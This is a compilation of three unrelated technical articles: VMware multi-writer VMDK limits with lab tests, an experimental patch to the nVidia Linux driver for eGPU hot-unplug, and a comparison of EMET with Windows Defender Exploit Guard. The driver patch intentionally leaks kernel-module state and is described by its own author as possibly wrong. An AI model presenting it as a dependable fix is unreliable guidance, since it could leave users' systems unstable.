VMware virtual disk (VMDK) in multi-writer mode

( original text by David Pasek )

VMFS is a clustered file system that, by default, prevents multiple virtual machines from opening and writing to the same virtual disk (VMDK file). This prevents more than one virtual machine from inadvertently accessing the same VMDK file and is a safety mechanism to avoid data corruption in cases where the applications in the virtual machines do not maintain consistency in the writes performed to the shared disk. However, you might have a third-party cluster-aware application, where the multi-writer option allows VMFS-backed disks to be shared by multiple virtual machines, leveraging a third-party OS/application cluster solution to share a single VMDK disk on a VMFS filesystem. In these cluster-aware applications, the application itself ensures that writes originating from multiple virtual machines do not cause data loss. Examples of such third-party cluster-aware applications are Oracle RAC, Veritas Cluster File System, etc.

There is a VMware KB article, “Enabling or disabling simultaneous write protection provided by VMFS using the multi-writer flag (1034165)”, available at https://kb.vmware.com/kb/1034165. The KB describes how to enable or disable the simultaneous write protection provided by VMFS using the multi-writer flag. It is the official resource on how to use the multi-writer flag, but the operational procedure is a little bit outdated, as vSphere 6.x supports this configuration from the Web Client (Flash) or vSphere Client (HTML5) GUI, as highlighted in the screenshot below.
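
For reference, the setting behind the GUI and the KB procedure is a per-disk sharing flag in the VM configuration. A minimal sketch of what it looks like in the .vmx file, assuming (as an example only) that the shared disk sits on SCSI controller 1, unit 0, and that the datastore and file names are placeholders:

scsi1:0.fileName = "/vmfs/volumes/Datastore01/App1/App1-shared.vmdk"
scsi1:0.sharing = "multi-writer"

In the vSphere 6.x GUI, the same flag is exposed as the disk’s Sharing option set to Multi-writer; it has to be set on every VM that opens the shared disk.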

However, KB 1034165 lists several important limitations which should be considered and addressed in the solution design. The limitations of multi-writer mode are:

  • The virtual disk must be eager zeroed thick; it cannot be lazy zeroed thick or thin provisioned (see the example command after this list).
  • Sharing is limited to 8 ESXi/ESX hosts with VMFS-3 (vSphere 4.x), VMFS-5 (vSphere 5.x), and VMFS-6 in multi-writer mode.
  • Hot adding a virtual disk removes the multi-writer flag.
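
Regarding the first limitation, here is a hedged example of creating an eager zeroed thick disk directly from the ESXi shell with vmkfstools; the size and datastore path are placeholders:

# create a 20 GB eager zeroed thick VMDK for the shared disk (size and path are examples only)
vmkfstools -c 20G -d eagerzeroedthick /vmfs/volumes/Datastore01/App1/App1-shared.vmdk

The same disk type can also be selected when creating the disk from the GUI (Thick Provision Eager Zeroed).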

Let’s focus on the 8 ESXi host limit. The statement above about scalability is a little bit unclear, which is why one of my customers asked me what it really means. I did some research on internal VMware resources and, fortunately enough, found an internal VMware discussion about this topic, so I think sharing the information will help the broader VMware community.

Here is the 8-host limit explained in other words …

“The 8-host limit defines how many ESXi hosts can simultaneously open the same virtual disk (VMDK file). If the cluster-aware application is not going to have more than 8 nodes, it works and it is supported. This limitation applies to the group of VMs sharing the same VMDK file for a particular instance of the cluster-aware application. In case you need to consolidate multiple application clusters into a single vSphere cluster, you can safely do so, and app nodes from one app cluster instance can run on other ESXi hosts than app nodes from another app cluster instance. It means that if you have more than one app cluster instance, all app cluster instances together can leverage resources from more than 8 ESXi hosts in the vSphere cluster.”

The best way to fully understand specific behavior is to test it. That’s why I have a pretty decent home lab. However, I do not have 10 physical ESXi hosts, so I created a nested vSphere environment with a vSphere cluster of 9 ESXi hosts. You can see the vSphere cluster with two App Cluster instances (App1, App2) in the screenshot below.

Application Cluster instance App1 is composed of 9 nodes (9 VMs) and instance App2 of just 2 nodes. Each instance shares its own VMDK disk. The whole test infrastructure is conceptually depicted in the figures below.

Test Step 1: I started 8 of the 9 VMs of the App1 cluster instance on 8 ESXi hosts (ESXi01-ESXi08). Such a setup works perfectly fine, as there is a 1:1 mapping between VMs and ESXi hosts, staying within the limit of 8 ESXi hosts having the shared VMDK1 open.

Test Step 2: The next step is to test the power-on operation of App1-VM9 on ESXi09. This operation fails. This is the expected result, because a 9th ESXi host cannot open the VMDK1 file on the VMFS datastore.

The error message is visible in the screenshot below.

Test Step 3: The next step is to power on App1-VM9 on ESXi01. This operation is successful, because two app cluster nodes (virtual machines App1-VM1 and App1-VM9) are running on a single ESXi host (ESXi01), therefore only 8 ESXi hosts have the VMDK1 file open and we stay within the supported limits.

Test Step 4: Let’s test vMotion of App1-VM9 from ESXi01 to ESXi09. This operation fails. This is the expected result, for the same reason as the power-on operation: the App1 cluster instance would be stretched across 9 ESXi hosts, but the 9th ESXi host cannot open the VMDK1 file on the VMFS datastore.

The error message is a little bit different, but the root cause is the same.

Test Step 5: Let’s test vMotion of App2-VM2 from ESXi08 to ESXi09. This operation works, because the App2 cluster instance is still stretched across only two ESXi hosts, so it is within the supported limit of 8 ESXi hosts.

Test Step 6: The last test is vMotion of App2-VM2 from the vSphere cluster (ESXi08) to a standalone ESXi host outside of the vSphere cluster (ESX01). This operation works, because the App2 cluster instance is still stretched across only two ESXi hosts, so it is within the supported limit of 8 ESXi hosts. The vSphere cluster is not the boundary for multi-writer VMDK mode.

FAQ

Q: What exactly does the limitation of 8 ESXi hosts mean?

A: The 8 ESXi host limit defines how many ESXi hosts can simultaneously open the same virtual disk (VMDK file). If the cluster-aware application is not going to have more than 8 nodes, it works and it is supported. Details and various scenarios are described in this article.

Q: Where is the information about the locks from ESXi hosts stored?

A: The normal VMFS file locking mechanism is in use, therefore there are VMFS file locks, which can be displayed with the ESXi command vmkfstools -D

The only difference is that multi-writer VMDKs can have multiple locks, as shown in the screenshot below.
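
For illustration, a sketch of checking those locks from the ESXi shell; the path is a placeholder and should point at the flat file of the shared VMDK:

# show the lock mode and lock holders for the shared disk (example path)
vmkfstools -D /vmfs/volumes/Datastore01/App1/App1-shared-flat.vmdk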

Q: Is it supported to use DRS rules for multi-writer VMDKs when there are more than 8 ESXi hosts in the cluster where the VMs with multi-writer VMDKs are running?

A: Yes, it is supported. DRS rules can be beneficial to keep all nodes of a particular App Cluster instance on specified ESXi hosts. This is neither necessary nor required from a technical point of view, but it can be beneficial from a licensing point of view.

Q: How can the ESXi lifecycle be handled with the 8 ESXi host limit?

A: Let’s discuss specific VM operations and the supportability of the multi-writer VMDK configuration. The source for the answers is VMware KB https://kb.vmware.com/kb/1034165

  • Power on, off, restart virtual machine – supported
  • Suspend VM – unsupported
  • Hot add virtual disks – supported only to existing adapters
  • Hot remove devices – supported
  • Hot extend virtual disk – unsupported
  • Connect and disconnect devices – supported
  • Snapshots – unsupported
  • Snapshots of VMs with independent-persistent disks – supported
  • Cloning – unsupported
  • Storage vMotion – unsupported
  • Changed Block Tracking (CBT) – unsupported
  • vSphere Flash Read Cache (vFRC) – unsupported
  • vMotion – supported by VMware for Oracle RAC only and limited to 8 ESX/ESXi hosts. Note: other cluster-aware applications are not supported by VMware but can be supported by partners. For example, Veritas products have their supportability documented at https://sort.veritas.com/public/documents/sfha/6.2/vmwareesx/productguides/html/sfhas_virtualization/ch01s05s01.htm. Please verify current supportability directly with the specific partners.

Q: Is it possible to migrate VMs with multi-writer VMDKs to a different cluster while they are offline?

A: Yes. The VM can be shut down or powered off and then powered on on any ESXi host outside of the vSphere cluster. The only requirement is to have the same VMFS datastore available on the source and target ESXi hosts. Please keep in mind that the maximum supported number of ESXi hosts connected to a single VMFS datastore is 64.

 

Patching nVidia GPU driver for hot-unplug on Linux

( original text by @whitequark )

Recently, I’ve been using an extremely cursed setup where my XPS 13 9360 laptop is connected to a Sonnet EchoExpress 2 box rewired for Thunderbolt 3 that has an nVidia Quadro 600 GPU, and Linux is set up for render offload to the eGPU and then frame transfer back to the iGPU to be displayed on the laptop’s integrated display, which (to my sheer surprise) not only works quite reliably, but even gives me higher FPS in Team Fortress 2 than the iGPU.

There’s only really one downside: if the eGPU falls off the bus, either because someone™ pulled out the cable, or because the stars didn’t align quite right this morning and it decided to enumerate seemingly at random (sometimes this is preceded by whining from PCIe AER, sometimes not; I think it’s some sort of hardware issue like a badly inserted PCIe card, but I’m not entirely sure), the nVidia driver… hangs. Hangs quite deliberately, as the sources to the kernel driver show. This leaves the Xorg instance bound to the eGPU hung forever (which confuses bumblebee, but is otherwise not especially bad), and also prevents any new ones from using the eGPU (which is bad).

Anyway, I was kind of annoyed by rebooting every time it happens, so I decided to reboot a few more dozen times instead while patching the driver. This has indeed worked, and left me with something similar to a functional hot-unplug, mildly crippled by the fact that nvidia-modeset is a completely opaque blob that keeps some internal state and tries to act on it, getting stuck when it tries to do something to the now-missing eGPU.

Turns out, there are only a few issues preventing functional hot-unplug.

  1. In nvidia_remove, the driver actually checks if anyone’s still trying to use it, and if yes, it tries to just hang the removal process. This doesn’t actually work, or rather, it mostly works by accident. It starts an infinite loop calling os_schedule() while having taken the NV_LINUX_DEVICES lock. While in the default configuration this indeed hangs any reentrant requests into the driver by virtue of NV_CHECK_PCI_CONFIG_SPACE taking the same lock (in verify_pci_bars), passing the NVreg_CheckPCIConfigSpace=0 module option eliminates that accidental safety mechanism, and allows reentrant requests to proceed. They do not crash due to memory being deallocated in nvidia_remove (so you don’t get an unhandled kernel page fault), but they still crash due to being unable to access the GPU.

  2. The NVKMS component (in the nvidia-modeset module) tries to maintain some state, and change it when e.g. the Xorg instance quits and closes the /dev/nvidia-modeset file. Unfortunately, it does not expect the GPU to go away, and first spews a few messages to dmesg similar to nvidia-modeset: ERROR: GPU:0: Failed to query display engine channel state: 0x0000857d:0:0:0x0000000f, after which it appears to hang somewhere inside the blob, which has been conveniently stripped of all symbols. This needs to be prevented, but…

  3. The NVKMS component effectively only exposes a single opaque ioctl, and all the communication, including communication of the GPU bus ID, happens out of band with regards to the open source parts of the nvidia-modeset module. Fortunately, NVKMS calls back into NVRM, and this allows us to associate each /dev/nvidia-modeset fd with the GPU bus ID.

  4. When unloading NVKMS, it also tries to act on its internal state and change the GPU state, which leads to the same hang.

All in all, this allows a patch to be written that detects when a GPU goes away, ignores all further NVKMS requests related to that specific GPU (and returns -ENOENT in response to ioctls, which Xorg appropriately interprets as a fault condition), correctly releases the resources by requesting NVRM, and improperly unloads NVKMS so it doesn’t try to reset the GPU state. (All actual resources should be released by this point, and NVKMS doesn’t have any resource allocation callbacks other than those we already intercept, so in theory this doesn’t have any bad consequences. But I’m not working for nVidia, so this might be completely wrong.)

After the GPU is plugged back in, NVKMS will try to act on its internal state again; in this case, it doesn’t hang, but it doesn’t initialize the GPU correctly either, so the nvidia-modeset kernel module has to be (manually) reloaded. It’s not easy to do this automatically because in a hypothetical system with more than one nVidia GPU the module would still be in use when one of them dies, and so just hard reloading NVKMS would have unfortunate consequences. (Though, I don’t really know whether NVKMS would try to access the dead GPU in response to the request acting on the other GPU anyway. I decided to do it conservatively.) Once it’s reloaded you’re back in the game though!
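
For completeness, a minimal sketch of that manual reload, matching the insmod.sh/rmmod.sh helper scripts shown further below (which assume a locally built nvidia-modeset.ko in the current directory):

#!/bin/sh
# re-load only the modeset blob after the eGPU has re-enumerated; nvidia.ko itself stays loaded
rmmod nvidia-modeset
insmod nvidia-modeset.ko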

Here’s the patch, written against the nvidia-legacy-390xx-390.87 Debian source package:

nvidia-hot-gpu-on-gpu-unplug-action.patch (download)

 
diff -ur original/common/inc/nv-linux.h patchedl/common/inc/nv-linux.h
--- original/common/inc/nv-linux.h	2018-09-23 12:20:02.000000000 +0000
+++ patched/common/inc/nv-linux.h	2018-10-28 07:19:21.526566940 +0000
@@ -1465,6 +1465,7 @@
 typedef struct nv_linux_state_s {
     nv_state_t nv_state;
     atomic_t usage_count;
+    atomic_t dead;
 
     struct pci_dev *dev;
 
diff -ur original/common/inc/nv-modeset-interface.h patched/common/inc/nv-modeset-interface.h
--- original/common/inc/nv-modeset-interface.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-modeset-interface.h	2018-10-28 07:22:00.768238371 +0000
@@ -25,6 +25,8 @@
 
 #include "nv-gpu-info.h"
 
+#include <asm/atomic.h>
+
 /*
  * nvidia_modeset_rm_ops_t::op gets assigned a function pointer from
  * core RM, which uses the calling convention of arguments on the
@@ -115,6 +117,8 @@
 
     int (*set_callbacks)(const nvidia_modeset_callbacks_t *cb);
 
+    atomic_t * (*gpu_dead)(NvU32 gpu_id);
+
 } nvidia_modeset_rm_ops_t;
 
 NV_STATUS nvidia_get_rm_ops(nvidia_modeset_rm_ops_t *rm_ops);
diff -ur original/common/inc/nv-proto.h patched/common/inc/nv-proto.h
--- original/common/inc/nv-proto.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-proto.h	2018-10-28 07:20:49.939494812 +0000
@@ -81,6 +81,7 @@
 NvBool      nvidia_get_gpuid_list       (NvU32 *gpu_ids, NvU32 *gpu_count);
 int         nvidia_dev_get              (NvU32, nvidia_stack_t *);
 void        nvidia_dev_put              (NvU32, nvidia_stack_t *);
+atomic_t *  nvidia_dev_dead             (NvU32);
 int         nvidia_dev_get_uuid         (const NvU8 *, nvidia_stack_t *);
 void        nvidia_dev_put_uuid         (const NvU8 *, nvidia_stack_t *);
 int         nvidia_dev_get_pci_info     (const NvU8 *, struct pci_dev **, NvU64 *, NvU64 *);
diff -ur original/nvidia/nv.c patched/nvidia/nv.c
--- original/nvidia/nv.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia/nv.c	2018-10-28 07:48:05.895025112 +0000
@@ -1944,6 +1944,12 @@
     unsigned int i;
     NvBool bRemove = NV_FALSE;
 
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_close called on dead device by pid %d!\n",
+                  current->pid);
+    }
+
     NV_CHECK_PCI_CONFIG_SPACE(sp, nv, TRUE, TRUE, NV_MAY_SLEEP());
 
     /* for control device, just jump to its open routine */
@@ -2106,6 +2112,12 @@
     size_t arg_size;
     int arg_cmd;
 
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_ioctl called on dead device by pid %d!\n",
+                  current->pid);
+    }
+
     nv_printf(NV_DBG_INFO, "NVRM: ioctl(0x%x, 0x%x, 0x%x)\n",
         _IOC_NR(cmd), (unsigned int) i_arg, _IOC_SIZE(cmd));
 
@@ -3217,6 +3229,7 @@
     NV_INIT_MUTEX(&nvl->ldata_lock);
 
     NV_ATOMIC_SET(nvl->usage_count, 0);
+    NV_ATOMIC_SET(nvl->dead, 0);
 
     if (!rm_init_event_locks(sp, nv))
         return NV_FALSE;
@@ -4018,14 +4031,38 @@
         nv_printf(NV_DBG_ERRORS,
                   "NVRM: Attempting to remove minor device %u with non-zero usage count!\n",
                   nvl->minor_num);
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: YOLO, waiting for usage count to drop to zero\n");
         WARN_ON(1);
 
-        /* We can't continue without corrupting state, so just hang to give the
-         * user some chance to do something about this before reboot */
-        while (1)
+        NV_ATOMIC_SET(nvl->dead, 1);
+
+        /* Insanity check: wait until all clients die, then hope for the best. */
+        while (1) {
+            UNLOCK_NV_LINUX_DEVICES();
             os_schedule();
-    }
+            LOCK_NV_LINUX_DEVICES();
+
+            nvl = pci_get_drvdata(dev);
+            if (!nvl || (nvl->dev != dev))
+            {
+                goto done;
+            }
+
+            if (NV_ATOMIC_READ(nvl->usage_count) == 0)
+            {
+                break;
+            }
+        }
 
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: Usage count is now zero, proceeding to remove the GPU\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: This is not actually supposed to work lol. Hope it does tho ????\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: You probably want to reload nvidia-modeset now if you want any "
+                  "of this to ever start up again, but like, man, that's your choice entirely\n");
+    }
     nv = NV_STATE_PTR(nvl);
     if (nvl == nv_linux_devices)
         nv_linux_devices = nvl->next;
@@ -4712,6 +4749,22 @@
     up(&nvl->ldata_lock);
 }
 
+atomic_t *nvidia_dev_dead(NvU32 gpu_id)
+{
+    nv_linux_state_t *nvl;
+    atomic_t *ret;
+
+    /* Takes nvl->ldata_lock */
+    nvl = find_gpu_id(gpu_id);
+    if (!nvl)
+        return NV_FALSE;
+
+    ret = &nvl->dead;
+    up(&nvl->ldata_lock);
+
+    return ret;
+}
+
 /*
  * Like nvidia_dev_get but uses UUID instead of gpu_id. Note that this may
  * trigger initialization and teardown of unrelated devices to look up their
diff -ur original/nvidia/nv-modeset-interface.c patched/nvidia/nv-modeset-interface.c
--- original/nvidia/nv-modeset-interface.c	2018-08-22 00:55:22.000000000 +0000
+++ patched/nvidia/nv-modeset-interface.c	2018-10-28 07:20:25.959243110 +0000
@@ -114,6 +114,7 @@
         .close_gpu      = nvidia_dev_put,
         .op             = rm_kernel_rmapi_op, /* provided by nv-kernel.o */
         .set_callbacks  = nvidia_modeset_set_callbacks,
+        .gpu_dead       = nvidia_dev_dead,
     };
 
     if (strcmp(rm_ops->version_string, NV_VERSION_STRING) != 0)
diff -ur original/nvidia/nv-reg.h patched/nvidia/nv-reg.h
diff -ur original/nvidia-modeset/nvidia-modeset-linux.c patched/nvidia-modeset/nvidia-modeset-linux.c
--- original/nvidia-modeset/nvidia-modeset-linux.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia-modeset/nvidia-modeset-linux.c	2018-10-28 07:47:14.738703417 +0000
@@ -75,6 +75,9 @@
 
 static struct semaphore nvkms_lock;
 
+static NvU32 clopen_gpu_id;
+static NvBool leak_on_unload;
+
 /*************************************************************************
  * NVKMS executes queued work items on a single kthread.
  *************************************************************************/
@@ -89,6 +92,9 @@
 struct nvkms_per_open {
     void *data;
 
+    NvU32 gpu_id;
+    atomic_t *gpu_dead;
+
     enum NvKmsClientType type;
 
     union {
@@ -711,6 +717,9 @@
     nvidia_modeset_stack_ptr stack = NULL;
     NvBool ret;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_open_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
+
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return NV_FALSE;
     }
@@ -719,6 +728,10 @@
 
     __rm_ops.free_stack(stack);
 
+    if (ret) {
+        clopen_gpu_id = gpuId;
+    }
+
     return ret;
 }
 
@@ -726,12 +739,17 @@
 {
     nvidia_modeset_stack_ptr stack = NULL;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_close_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
+
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return;
     }
 
     __rm_ops.close_gpu(gpuId, stack);
 
+    clopen_gpu_id = gpuId;
+
     __rm_ops.free_stack(stack);
 }
 
@@ -771,8 +789,14 @@
 
     popen->type = type;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_open_common, pid %d\n",
+           current->pid);
+
     *status = down_interruptible(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_open_common, pid %d\n",
+           current->pid);
+
     if (*status != 0) {
         goto failed;
     }
@@ -781,6 +805,9 @@
 
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_open_common, pid %d\n",
+           current->pid);
+
     if (popen->data == NULL) {
         *status = -EPERM;
         goto failed;
@@ -799,10 +826,16 @@
 
     *status = 0;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting in nvkms_open_common, pid %d\n",
+           current->pid);
+
     return popen;
 
 failed:
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "error in nvkms_open_common, pid %d\n",
+           current->pid);
+
     nvkms_free(popen, sizeof(*popen));
 
     return NULL;
@@ -816,14 +849,36 @@
      * mutex.
      */
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_close_common, pid %d\n",
+           current->pid);
+
     down(&nvkms_lock);
 
-    nvKmsClose(popen->data);
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_close_common, pid %d\n",
+           current->pid);
+
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "awwww u need cleanup :3 "
+               "in nvkms_close_common, pid %d\n",
+               current->pid);
+
+        nvkms_close_gpu(popen->gpu_id);
+
+        popen->gpu_id = 0;
+        popen->gpu_dead = NULL;
+
+        leak_on_unload = NV_TRUE;
+    } else {
+        nvKmsClose(popen->data);
+    }
 
     popen->data = NULL;
 
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_close_common, pid %d\n",
+           current->pid);
+
     if (popen->type == NVKMS_CLIENT_KERNEL_SPACE) {
         /*
          * Flush any outstanding nvkms_kapi_event_kthread_q_callback() work
@@ -844,6 +899,9 @@
     }
 
     nvkms_free(popen, sizeof(*popen));
+
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting nvkms_close_common, pid %d\n",
+           current->pid);
 }
 
 int NVKMS_API_CALL nvkms_ioctl_common
@@ -855,20 +913,58 @@
     int status;
     NvBool ret;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
     status = down_interruptible(&nvkms_lock);
     if (status != 0) {
         return status;
     }
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        goto dead;
+    }
+
+    clopen_gpu_id = 0;
+
     if (popen->data != NULL) {
         ret = nvKmsIoctl(popen->data, cmd, address, size);
     } else {
         ret = NV_FALSE;
     }
 
+    if (clopen_gpu_id != 0) {
+        if (!popen->gpu_id) {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x open in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = clopen_gpu_id;
+            popen->gpu_dead = __rm_ops.gpu_dead(clopen_gpu_id);
+        } else {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x close in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = 0;
+            popen->gpu_dead = NULL;
+        }
+    }
+
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
     return ret ? 0 : -EPERM;
+
+dead:
+    up(&nvkms_lock);
+
+    printk(KERN_ERR NVKMS_LOG_PREFIX "*notices ur gpu is dead* owo whats this "
+           "in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
+    return -ENOENT;
 }
 
 /*************************************************************************
@@ -1239,9 +1335,14 @@
 
     nvkms_proc_exit();
 
-    down(&nvkms_lock);
-    nvKmsModuleUnload();
-    up(&nvkms_lock);
+    if(leak_on_unload) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "im just gonna leak all the kms junk ok? "
+               "haha nvm wasnt a question. in nvkms_exit\n");
+    } else {
+        down(&nvkms_lock);
+        nvKmsModuleUnload();
+        up(&nvkms_lock);
+    }
 
     /*
      * At this point, any pending tasks should be marked canceled, but

 

Here are some handy scripts I was using while debugging it:

insmod.sh

 
#!/bin/sh -ex
modprobe acpi_ipmi
insmod nvidia.ko NVreg_ResmanDebugLevel=-1 NVreg_CheckPCIConfigSpace=0
insmod nvidia-modeset.ko
dmesg -w

 
rmmod.sh

 
#!/bin/sh
rmmod nvidia-modeset
rmmod nvidia

 
xorg.sh

 
#!/bin/sh
exec Xorg :8 -config /etc/bumblebee/xorg.conf.nvidia -configdir /etc/bumblebee/xorg.conf.d -sharevts -nolisten tcp -noreset -verbose 3 -isolateDevice PCI:06:00:0 -modulepath /usr/lib/nvidia/nvidia,/usr/lib/xorg/modules

 

And finally, here are the relevant kernel and Xorg log messages, showing what happens when a GPU is unplugged:

dmesg.log

 
[  219.524218] NVRM: loading NVIDIA UNIX x86_64 Kernel Module  390.87  Tue Aug 21 12:33:05 PDT 2018 (using threaded interrupts)
[  219.527409] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
[  224.780721] nvidia-modeset: nvkms_open_gpu called with 00000600, pid 4560
[  224.807370] nvidia-modeset: detected gpu 00000600 open in nvkms_ioctl_common, pid 4560
[  239.061383] NVRM: GPU at PCI:0000:06:00: GPU-9fe1319c-8dd3-44e4-2b74-de93f8b02c6a
[  239.061387] NVRM: Xid (PCI:0000:06:00): 79, GPU has fallen off the bus.
[  239.061389] NVRM: GPU at 0000:06:00.0 has fallen off the bus.
[  239.061398] NVRM: A GPU crash dump has been created. If possible, please run
               NVRM: nvidia-bug-report.sh as root to collect this data before
               NVRM: the NVIDIA kernel module is unloaded.
[  240.209498] NVRM: Attempting to remove minor device 0 with non-zero usage count!
[  240.209501] NVRM: YOLO, waiting for usage count to drop to zero
[  241.433499] nvidia-modeset: *notices ur gpu is dead* owo whats this in nvkms_ioctl_common, pid 4560
[  241.433851] nvidia-modeset: awwww u need cleanup :3 in nvkms_close_common, pid 4560
[  241.433853] nvidia-modeset: nvkms_close_gpu called with 00000600, pid 4560
[  250.440498] NVRM: Usage count is now zero, proceeding to remove the GPU
[  250.440513] NVRM: This is not actually supposed to work lol. Hope it does tho ????
[  250.440520] NVRM: You probably want to reload nvidia-modeset now if you want any of this to ever start up again, but like, man, that's your choice entirely
[  250.440870] pci 0000:06:00.1: Dropping the link to 0000:06:00.0
[  250.440950] pci_bus 0000:06: busn_res: [bus 06] is released
[  250.440982] pci_bus 0000:07: busn_res: [bus 07-38] is released
[  250.441012] pci_bus 0000:05: busn_res: [bus 05-38] is released
[  251.000794] pci_bus 0000:02: Allocating resources
[  251.001324] pci_bus 0000:02: Allocating resources
[  253.765953] pcieport 0000:00:1c.0: AER: Corrected error received: 0000:00:1c.0
[  253.765969] pcieport 0000:00:1c.0: PCIe Bus Error: severity=Corrected, type=Physical Layer, (Receiver ID)
[  253.765976] pcieport 0000:00:1c.0:   device [8086:9d10] error status/mask=00002001/00002000
[  253.765982] pcieport 0000:00:1c.0:    [ 0] Receiver Error         (First)
[  253.841064] pcieport 0000:02:02.0: Refused to change power state, currently in D3
[  253.843882] pcieport 0000:02:00.0: Refused to change power state, currently in D3
[  253.846177] pci_bus 0000:03: busn_res: [bus 03] is released
[  253.846248] pci_bus 0000:04: busn_res: [bus 04-38] is released
[  253.846300] pci_bus 0000:39: busn_res: [bus 39] is released
[  253.846348] pci_bus 0000:02: busn_res: [bus 02-39] is released
[  353.369487] nvidia-modeset: im just gonna leak all the kms junk ok? haha nvm wasnt a question. in nvkms_exit
[  357.600350] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018

 
Xorg.8.log

 
[   244.798] (EE) NVIDIA(GPU-0): WAIT (2, 8, 0x8000, 0x000011f4, 0x00001210)

Comparison between Enhanced Mitigation Experience Toolkit and Windows Defender Exploit Guard


 Important

If you are currently using EMET, you should be aware that EMET reached end of life on July 31, 2018. You should consider replacing EMET with exploit protection in Windows Defender ATP.

You can convert an existing EMET configuration file into Exploit protection to make the migration easier and keep your existing settings.
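
As a sketch of that conversion path, the ProcessMitigation PowerShell cmdlets shipped with Windows 10 can take an exported EMET XML configuration and apply it as an Exploit protection policy; the file names here are placeholders:

PS C:\> ConvertTo-ProcessMitigationPolicy -EMETFilePath .\EMET_Export.xml -OutputFilePath .\ExploitProtection.xml
PS C:\> Set-ProcessMitigation -PolicyFilePath .\ExploitProtection.xml

The resulting XML can then be deployed with Group Policy, Configuration Manager, or Intune, as listed in the feature comparison below.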

This topic describes the differences between the Enhanced Mitigation Experience Toolkit (EMET) and exploit protection in Windows Defender ATP.

Exploit protection in Windows Defender ATP is our successor to EMET and provides stronger protection, more customization, an easier user interface, and better configuration and management options.

EMET is a standalone product for earlier versions of Windows and provides some mitigation against older, known exploit techniques.


After July 31, 2018, it will not be supported.

For more information about the individual features and mitigations available in Windows Defender ATP, as well as how to enable, configure, and deploy them to better protect your network, see the documentation for each Windows Defender Exploit Guard feature.

Feature comparison

This section illustrates the differences between EMET and Windows Defender Exploit Guard, feature by feature.

  • Windows versions – Windows Defender Exploit Guard: all versions of Windows 10 starting with version 1709. EMET: Windows 8.1, Windows 8, and Windows 7; cannot be installed on Windows 10, version 1709 and later.
  • Installation requirements – Windows Defender Exploit Guard: Windows Security in Windows 10 (no additional installation required); it is built into Windows and doesn’t require a separate tool or package for management, configuration, or deployment. EMET: available only as an additional download and must be installed onto a management device.
  • User interface – Windows Defender Exploit Guard: modern interface integrated with the Windows Security app. EMET: older, complex interface that requires considerable ramp-up training.
  • Supportability – Windows Defender Exploit Guard: dedicated submission-based support channel(1); part of the Windows 10 support lifecycle. EMET: support ends after July 31, 2018.
  • Updates – Windows Defender Exploit Guard: ongoing updates and development of new features, released twice yearly as part of the Windows 10 semi-annual update channel. EMET: no planned updates or development.
  • Exploit protection – Windows Defender Exploit Guard: all EMET mitigations plus new, specific mitigations (see the mitigation comparison); can convert and import existing EMET configurations. EMET: limited set of mitigations.
  • Attack surface reduction(2) – Windows Defender Exploit Guard: helps block known infection vectors; can configure individual rules. EMET: limited ruleset configuration only for modules (no processes).
  • Network protection(2) – Windows Defender Exploit Guard: helps block malicious network connections. EMET: not available.
  • Controlled folder access(2) – Windows Defender Exploit Guard: helps protect important folders; configurable for apps and folders. EMET: not available.
  • Configuration with GUI (user interface) – Windows Defender Exploit Guard: use the Windows Security app to customize and manage configurations. EMET: requires installation and use of the EMET tool.
  • Configuration with Group Policy – Windows Defender Exploit Guard: use Group Policy to deploy and manage configurations. EMET: available.
  • Configuration with shell tools – Windows Defender Exploit Guard: use PowerShell to customize and manage configurations. EMET: requires use of the EMET tool (EMET_CONF).
  • System Center Configuration Manager – Windows Defender Exploit Guard: use Configuration Manager to customize, deploy, and manage configurations. EMET: not available.
